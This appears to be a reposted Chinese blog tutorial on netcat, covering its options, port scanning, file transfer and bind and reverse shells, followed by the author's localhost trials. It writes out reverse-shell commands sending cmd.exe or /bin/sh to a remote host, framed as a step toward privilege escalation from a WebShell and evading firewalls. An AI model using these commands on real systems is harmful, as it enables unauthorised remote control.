图解用NetCat连接远程端口
一 Netcat使用手冊(cè)
簡介:
在網(wǎng)絡(luò)工具中有“瑞士軍刀”美譽(yù)的NetCat(以下簡稱nc),在我們用了N年了至今仍是愛不釋手。因?yàn)樗绦【?#xff08;這個(gè)用在它身上很適合,現(xiàn)在有人已經(jīng)將其修改成大約10K左右,而且功能不減少)。
?
參數(shù)格式?
連接到某處:
?
nc [-options] hostname port[s] [ports] …
?
監(jiān)聽端口等待連接:
?
nc -l -p port [-options] [hostname] [port]
?
主要參數(shù):
??
options:
?
-d ? ? ? ? ? ? ?無命令行界面,使用后臺(tái)模式
?
-e prog ? ? ? ? ?程序重定向 [危險(xiǎn)!!]
?
-g gateway ? ? ? 源路由跳躍點(diǎn), 不超過8
?
-G num ? ? ? ? ?源路由指示器: 4, 8, 12, ...
?
-h ? ? ? ? ? ? ?獲取幫助信息
?
-i secs ? ? ? ? ? 延時(shí)設(shè)置,端口掃描時(shí)使用
?
-l ? ? ? ? ? ? ? 監(jiān)聽入站信息
?
-L ? ? ? ? ? ? ?監(jiān)聽知道NetCat被結(jié)束(可斷開重連)
?
-n ? ? ? ? ? ? ?以數(shù)字形式表示的IP地址
?
-o file ? ? ? ? ? 使進(jìn)制記錄
?
-p port ? ? ? ? ?打開本地端口
?
-r ? ? ? ? ? ? ? 隨機(jī)本地和遠(yuǎn)程的端口
?
-s addr ? ? ? ? ?本地源地址
?
-t ? ? ? ? ? ? ? 以TELNET的形式應(yīng)答入站請(qǐng)求
?
-u ? ? ? ? ? ? ?UDP 模式
?
-v ? ? ? ? ? ? ? 顯示詳細(xì)信息 [使用=vv獲取更詳細(xì)的信息]
?
-w secs ? ? ? ? ?連接超時(shí)設(shè)置
?
-z ? ? ? ? ? ? ? I/O 模式 [掃描時(shí)使用]
?
端口號(hào)可以是單個(gè)的或者存在一個(gè)范圍: m-n [包含值]。
?
?
主要用途
?
一般我們使用netcat做的最多的事情為以下三種:
?
1、 ?掃描指定IP端口情況
?
2、 ?端口轉(zhuǎn)發(fā)數(shù)據(jù)(重點(diǎn))
?
3、提交自定義數(shù)據(jù)包
?
1、掃描常用命令。
?
以下IP 處可以使用域名,nc會(huì)調(diào)用NDS解析成IP地址。
?
【命令】nc -v ip port
?
【例如】nc -v 96.44.174.9 80
?
【解釋】掃瞄某 IP 的某個(gè)端口,返回端口信息詳細(xì)輸出。
?
【命令】nc -v -z ip port-port
?
【例如】nc -v -z 96.44.174.9 80-1024
?
【解釋】掃描某IP的端口段,返回端口信息詳細(xì)輸出,但掃描速度很慢。
?
【命令】nc -v -z -u ip ?port-port
?
【例如】nc -v -z -u 96.44.174.9 25-1024
?
【解釋】掃描某 IP 的某 UDP 端口段,返回端口信息詳細(xì)輸出,但掃描速度很慢。
?
【命令】nc -nvv -w2 -z ip port-port
?
【例如】nc -nvv -w2 -z 96.44.174.9 80-1024
?
【解釋】掃錨某IP的端口段,連接超時(shí)時(shí)間為2秒。
?
實(shí)例:
?
總結(jié):使用nc掃描速度真的不敢恭維,而且對(duì)于掃描主機(jī)存活、端口等還是交給更專業(yè)的nmap來進(jìn)行,物盡其用才是硬道理,這里全當(dāng)科普。
?
2、監(jiān)聽端口、連接端口、轉(zhuǎn)發(fā)端口常用命令。
?
【命令】nc -l -p 520
?
【解釋】開啟本機(jī)的 TCP 520 端口并監(jiān)聽次端口的上傳輸?shù)臄?shù)據(jù)。
?
【命令】nc -l -v -p 520
?
【解釋】開啟本機(jī)的 TCP 520 端口并將監(jiān)聽到的信息輸出到當(dāng)前 CMD 窗口。這個(gè)命令也是端口轉(zhuǎn)發(fā)shell的基礎(chǔ)。
?
【命令】nc -l -p 520 > C:/log.dat
?
【解釋】開啟本機(jī)的 TCP 520 端口并將監(jiān)聽到的信息輸出到 C:/log.dat 下的日志文件里。
?
【命令】nc -nvv 192.168.1.101 520
?
【解釋】連接到192.168.1.101主機(jī)的 520。
?
重點(diǎn)一(正向連接):
?
【遠(yuǎn)程運(yùn)行】nc -l -p 2012 -t -e C:WINDOWSsystem32cmd.exe
?
【本地運(yùn)行】nc -nvv 192.168.1.101 2012
?
【解釋】采用正向連接方式,遠(yuǎn)程主機(jī)(注:假設(shè)IP地址為 192.168.1.101)上運(yùn)行 nc -l -p 2012 -t -e cmd.exe 意為綁定遠(yuǎn)程主機(jī)的 CMD 到2012 端口,當(dāng)本地主機(jī)連接遠(yuǎn)程主機(jī)成功時(shí)就會(huì)返回給本地主機(jī)一個(gè)CMD Shell ;在本地主機(jī)上運(yùn)行 nc -nvv 192.168.1.101 2012 用于連接已經(jīng)將 CMD 重定向到 2012 端口的遠(yuǎn)程主機(jī)(注:假設(shè)IP地址為 192.168.1.101)。
?
重點(diǎn)二(反向連接):
?
【本地運(yùn)行】nc -l –vv -p 2012
?
【遠(yuǎn)程運(yùn)行】nc -t -e C:WINDOWSsystem32cmd.exe 192.168.1.102 2012
?
【解釋】采用反向連接方式,先在本地主機(jī)(擁有公網(wǎng)IP)運(yùn)行 nc -l –vv -p 2012 開啟2012 端口并監(jiān)聽等待遠(yuǎn)程主機(jī)連接;在遠(yuǎn)程主機(jī)上運(yùn)行 nc -t -e cmd.exe 192.168.1.102 2012 將遠(yuǎn)程主機(jī)的 CMD 重定向到 IP 地址為 192.168.1.102 端口號(hào)為2012 的主機(jī)上,連接成功后 IP 地址為 192.168.1.102 的主機(jī)會(huì)得到一個(gè)CMD Shell。
?
總結(jié):這個(gè)情況是最常用的內(nèi)網(wǎng)端口轉(zhuǎn)發(fā)功能,這樣反彈shell即可執(zhí)行命令。反向連接就是常用的反彈shell到本地,因?yàn)橛芍鳈C(jī)主動(dòng)發(fā)送的情況本地防火墻等設(shè)備一般不會(huì)去攔截,而正向連接到遠(yuǎn)程主機(jī)的某端口常常被攔截。
?
實(shí)例:
?
(上面一個(gè)cmd是公網(wǎng)IP主機(jī),下圖為筆者本地主機(jī),可以通過目錄看到shell可執(zhí)行命令)
?
4、提交數(shù)據(jù)、文件傳輸常用命令
?
【命令】nc -vv www.91ri.org port < C:/http.txt
?
【例如】nc -vv www.91ri.org 80 < C:/http.txt
?
【解釋】提交http.txt內(nèi)數(shù)據(jù)包到www.91ri.org的80端口,-vv參數(shù)會(huì)使速度變慢,但可以跟蹤過程。例如IISput漏洞就可以自定義數(shù)據(jù)包使用此方法提交。
?
【命令1】nc -v -n ip port < C:/sunzn.exe
?
【命令2】nc -v -l -p port > D:/sunzn.exe
?
【解釋】在本地運(yùn)行 nc -v -n ip port < C:/sunzn.exe 意為從本地 C 盤根目錄中讀取 sunzn.exe 文件的內(nèi)容,并把這些數(shù)據(jù)發(fā)送到遠(yuǎn)程主機(jī)的對(duì)應(yīng)端口上(注:命令行中的 IP 為接收文件的遠(yuǎn)程主機(jī) IP ),在遠(yuǎn)程主機(jī)運(yùn)行 nc -v -l -p port > D:/sunzn.exe 意為監(jiān)聽對(duì)應(yīng)端口并把接收到的信息數(shù)據(jù)寫到 D:/sunzn.exe 中,兩行命令實(shí)現(xiàn)了文件在本地主機(jī)和遠(yuǎn)程主機(jī)間的傳輸。
?
傳輸http數(shù)據(jù)包實(shí)例:
?
Linux環(huán)境下netcat使用
?
好東西肯定需要在不同的環(huán)境中都能使用,在linux環(huán)境中同樣有著netcat可以使用。主要過程如下。
?
Linux提權(quán)絕大部分都靠的是Local Exploit。WebShell一般都可以執(zhí)行命令,但是溢出必須在可交互環(huán)境運(yùn)行,否則如果直接在WebShell執(zhí)行,即使能溢出提權(quán)成功,也沒法利用。因此必須要反彈一個(gè)Shell命令行窗口,在命令行終端下執(zhí)行溢出進(jìn)行提權(quán)。
?
主要步驟:
?
1、wget一個(gè)tar壓縮的nc
?
Wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz?
?
2、解壓文件
tar zxvf netcat-0.7.1.tar.gz?
?
3、解壓完畢之后會(huì)生成目錄
??
cd netcat-0.7.1?
?
4、配置環(huán)境
?
./configure?
?
5、配置完了之后就可以編譯了。
??
Make?
?
6、編譯成功就生成了netcat可執(zhí)行的文件了,位于src目錄,cd進(jìn)去進(jìn)行運(yùn)行./netcat文件就是我們的nc了。
?
遠(yuǎn)程Linux轉(zhuǎn)發(fā)命令
?
./netcat 8.8.8.8 1234 -e /bin/sh?
?
?
from:http://www.91ri.org/7761.html?
?
?
二 操作實(shí)例
nc -l -v -p 520 開啟本機(jī)520端口,監(jiān)聽,在控制臺(tái)顯示監(jiān)聽到的內(nèi)容; 下圖,第一條命令,先檢查本機(jī)是否打開520端口,未開; 第二條命令開啟520;進(jìn)入監(jiān)聽狀態(tài); 再另外打開一個(gè)CMD,查看520,發(fā)現(xiàn)520端口已經(jīng)打開;?
開啟520并進(jìn)入監(jiān)聽后,打Ctrl+C退出;
在另一個(gè)CMD查找520,找不到了;
?
192.168.1.87的23端口已知開放;
打入下圖命令連接;提示連接拒絕,估計(jì)被殺軟禁止了;
?
下面以127.0.0.1模擬遠(yuǎn)程;
?
在遠(yuǎn)程機(jī)器上運(yùn)行:
nc -l -p 2099 -t -e C:\Windows\system32\cmd.exe
把cmd綁定到2099端口;
?
在本機(jī)運(yùn)行:
nc -nvv 127.0.0.1 2099
連接遠(yuǎn)程的2099;
?
在123號(hào)端口同樣操作一次;
?
上面兩個(gè)操作都只是顯示open,就退出;是啥情況還得研究;
?
正向連接;
第一個(gè)cmd,遠(yuǎn)程主機(jī),打開2099并監(jiān)聽;
第二個(gè)cmd,遠(yuǎn)程主機(jī),綁定cmd到2099;
第三個(gè)cmd,本地,連接遠(yuǎn)程主機(jī)的2099;下圖是第三個(gè)cmd敲入了命令未回車的截圖;
?
回車以后如下圖;顯示連接上了;
?
根據(jù)資料說似乎到此可在遠(yuǎn)程主機(jī)上執(zhí)行cmd命令了,不過看下圖的顯示;只是在本機(jī)打的命令,會(huì)在遠(yuǎn)程的監(jiān)聽端口顯示而已;
這是啥情況尼,也許是殺軟禁止了;再說咱也沒干過黑別人電腦的事;下次再研究吧;
?
反向連接;按資料說更不易被防火墻阻止;
第一個(gè)cmd,本機(jī),打開2099進(jìn)入監(jiān)聽;
第二個(gè)cmd,本機(jī),開啟2099端口并監(jiān)聽等待遠(yuǎn)程主機(jī)連接;
第三個(gè)cmd,遠(yuǎn)程主機(jī),將遠(yuǎn)程主機(jī)的 CMD 重定向到 IP 地址為 127.0.0.1 端口號(hào)為2099 的主機(jī)上,
按資料說成功后遠(yuǎn)程主機(jī)將獲得一個(gè)CMD Shell;意思是遠(yuǎn)程主機(jī)可操作本地的cmd命令;
?
不過連接了以后情況如下;遠(yuǎn)程主機(jī)看上去是連上了;不過打命令也無反應(yīng);
估計(jì)此類方法當(dāng)前都被殺軟禁止了;
?
總結(jié)
以上是生活随笔為你收集整理的图解用NetCat连接远程端口的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 图解第一个Matlab仿真实例
- 下一篇: Telerik for Winform